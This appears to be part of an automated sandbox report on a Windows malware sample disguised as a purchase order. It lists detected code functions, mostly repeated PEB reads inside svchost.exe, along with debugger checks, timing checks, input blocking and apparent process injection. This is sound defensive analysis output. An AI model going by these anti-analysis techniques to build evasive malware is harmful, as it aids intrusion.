            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_0040E500
            Source: at.exe, 00000003.00000002.3546898419.0000000003452000.00000004.00000020.00020000.00000000.sdmp, yRUFfzlnDkMN.exe, 00000007.00000002.3547357398.0000000000C7F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2247643841.00000206387CC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\PO #86637.exe | API call chain: ExitProcess graph end node graph_0-84807
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\at.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00417703 LdrLoadDll, 1_2_00417703
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_040D24F8 mov eax, dword ptr fs:[00000030h] 0_2_040D24F8
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_040D2558 mov eax, dword ptr fs:[00000030h] 0_2_040D2558
            Source: C:\Users\user\Desktop\PO #86637.exe | Code function: 0_2_040D0EC8 mov eax, dword ptr fs:[00000030h] 0_2_040D0EC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h] 1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B035C mov eax, dword ptr fs:[00000030h] 1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B035C mov ecx, dword ptr fs:[00000030h] 1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034FA352 mov eax, dword ptr fs:[00000030h] 1_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D8350 mov ecx, dword ptr fs:[00000030h] 1_2_034D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0350634F mov eax, dword ptr fs:[00000030h] 1_2_0350634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D437C mov eax, dword ptr fs:[00000030h] 1_2_034D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0346A30B mov eax, dword ptr fs:[00000030h] 1_2_0346A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342C310 mov ecx, dword ptr fs:[00000030h] 1_2_0342C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03450310 mov ecx, dword ptr fs:[00000030h] 1_2_03450310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03508324 mov eax, dword ptr fs:[00000030h] 1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03508324 mov ecx, dword ptr fs:[00000030h] 1_2_03508324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EC3CD mov eax, dword ptr fs:[00000030h] 1_2_034EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0343A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B63C0 mov eax, dword ptr fs:[00000030h] 1_2_034B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DE3DB mov eax, dword ptr fs:[00000030h] 1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_034DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034D43D4 mov eax, dword ptr fs:[00000030h] 1_2_034D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034403E9 mov eax, dword ptr fs:[00000030h] 1_2_034403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0344E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034663FF mov eax, dword ptr fs:[00000030h] 1_2_034663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342E388 mov eax, dword ptr fs:[00000030h] 1_2_0342E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0345438F mov eax, dword ptr fs:[00000030h] 1_2_0345438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03428397 mov eax, dword ptr fs:[00000030h] 1_2_03428397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B8243 mov eax, dword ptr fs:[00000030h] 1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B8243 mov ecx, dword ptr fs:[00000030h] 1_2_034B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0350625D mov eax, dword ptr fs:[00000030h] 1_2_0350625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342A250 mov eax, dword ptr fs:[00000030h] 1_2_0342A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03436259 mov eax, dword ptr fs:[00000030h] 1_2_03436259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034EA250 mov eax, dword ptr fs:[00000030h] 1_2_034EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03434260 mov eax, dword ptr fs:[00000030h] 1_2_03434260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342826B mov eax, dword ptr fs:[00000030h] 1_2_0342826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034E0274 mov eax, dword ptr fs:[00000030h] 1_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0342823B mov eax, dword ptr fs:[00000030h] 1_2_0342823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h] 1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h] 1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h] 1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h] 1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h]1_2_0342A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]1_2_03432050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]1_2_034B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]1_2_0345C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]1_2_034B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h]1_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h]1_2_0344E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]1_2_0342A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]1_2_0342C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]1_2_034C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]1_2_034B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0342A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]1_2_034380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]1_2_034B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]1_2_0342C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]1_2_034720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]1_2_0343208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]1_2_034280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]1_2_034C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]1_2_034F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346674D mov eax, dword ptr fs:[00000030h]1_2_0346674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]1_2_03430750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]1_2_034BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472750 mov eax, dword ptr fs:[00000030h]1_2_03472750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]1_2_034B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]1_2_03438770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440770 mov eax, dword ptr fs:[00000030h]1_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]1_2_0346C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]1_2_03430710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]1_2_03460710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h]1_2_0346C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346273C mov eax, dword ptr fs:[00000030h]1_2_0346273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]1_2_034AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]1_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]1_2_034B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034527ED mov eax, dword ptr fs:[00000030h]1_2_034527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]1_2_034BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034347FB mov eax, dword ptr fs:[00000030h]1_2_034347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]1_2_034D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]1_2_034307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]1_2_034E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]1_2_0344C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F866E mov eax, dword ptr fs:[00000030h]1_2_034F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h]1_2_0346A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]1_2_03462674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]1_2_034AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344260B mov eax, dword ptr fs:[00000030h]1_2_0344260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]1_2_03472619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]1_2_0344E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]1_2_03466620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]1_2_03468620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]1_2_0343262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]1_2_0346A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h]1_2_034AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h]1_2_034B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03434690 mov eax, dword ptr fs:[00000030h]1_2_03434690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]1_2_0346C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]1_2_034666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03438550 mov eax, dword ptr fs:[00000030h]1_2_03438550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346656A mov eax, dword ptr fs:[00000030h]1_2_0346656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]1_2_034C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504500 mov eax, dword ptr fs:[00000030h]1_2_03504500
